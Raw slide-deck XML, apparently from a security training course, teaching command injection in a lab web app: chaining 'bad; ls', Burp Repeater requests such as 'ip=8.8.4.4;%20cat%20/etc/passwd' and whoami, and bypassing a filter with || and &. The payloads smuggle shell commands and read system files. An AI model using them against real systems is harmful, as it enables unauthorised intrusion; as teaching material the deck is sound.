                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175" name="Google Shape;1175;p7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9" name="Shape 1179"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1180" name="Google Shape;1180;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Command Injection Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="964500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Change your injection to use a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>bad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> IP address, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>fake_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>. How does the output change?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="6A737D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1182" name="Google Shape;1182;p7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83" name="Google Shape;1183;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1909775"/>
            <a:ext cx="9144000" cy="2129100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Try injecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>bad; ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1800">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800">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>You'll get output from ls, but no error message from ping.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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7" name="Shape 1187"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188" name="Google Shape;1188;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Command Injection Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Google Shape;1189;p7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sz="1600"/>
              <a:t>Enable Foxy Proxy, launch Burp Suite, and intercept a request through the IP address form.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Send the request to Repeater. Update the IP address to use the same payloads you delivered previously.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1190" name="Google Shape;1190;p7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91" name="Google Shape;1191;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1938325"/>
            <a:ext cx="9144000" cy="2968200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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5" name="Shape 1195"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1196" name="Google Shape;1196;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Command Injection Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1197" name="Google Shape;1197;p7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sz="1600"/>
              <a:t>Enable Foxy Proxy, launch Burp Suite, and intercept a request through the IP address form.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Send the request to Repeater. Update the IP address to use the same payloads you delivered previously.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1198" name="Google Shape;1198;p7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99" name="Google Shape;1199;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1938325"/>
            <a:ext cx="9144000" cy="2968200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ip=8.8.4.4;%20cat%20/etc/passwd&amp;Submit=submit </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ip=8.8.4.4;%20whoami&amp;Submit=submit</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ip=8.8.4.4;%20uname&amp;Submit=submit</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ip=8.8.4.4;%20ps%20aux&amp;Submit=submit</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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3" name="Shape 1203"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1204" name="Google Shape;1204;p77"/>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Code Injection Filters and Bypasses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205" name="Google Shape;1205;p7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9" name="Shape 1209"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1210" name="Google Shape;1210;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2516200" y="1545675"/>
            <a:ext cx="60345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When PHP code removes &amp;&amp; and ; from user submitted commands, thus preventing injection, attackers can still use two other commands:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>double</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t> brackets) and &amp; (single ampersand)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211" name="Google Shape;1211;p7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5" name="Shape 1215"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p7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17" name="Google Shape;1217;p79"/>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solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>| | and &amp;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C23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1" name="Shape 1221"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1222" name="Google Shape;1222;p80"/>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1223" name="Google Shape;1223;p8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24" name="Google Shape;1224;p80"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Loud Pipes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latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will use  | | and &amp; to bypass a simple user-input filter.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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Instructions sent via Slack.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8" name="Shape 1228"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p8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30" name="Google Shape;1230;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571750" y="3446775"/>
            <a:ext cx="3980400" cy="85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Loud Pipes</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9" name="Shape 1039"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1040" name="Google Shape;1040;p55"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Minutes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041" name="Google Shape;1041;p5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42" name="Google Shape;1042;p55"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Webshell Warm-Up</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latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will review concepts covered last class about Webshell.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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Instructions sent via Slack.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4" name="Shape 1234"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1235" name="Google Shape;1235;p8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Loud Pipes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Review #1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1236" name="Google Shape;1236;p8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sz="1500">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Click Command Injection in the left navigation bar, and make sure your security level is set to medium. Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> to:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Check the installed version of Perl</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>List running network services (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
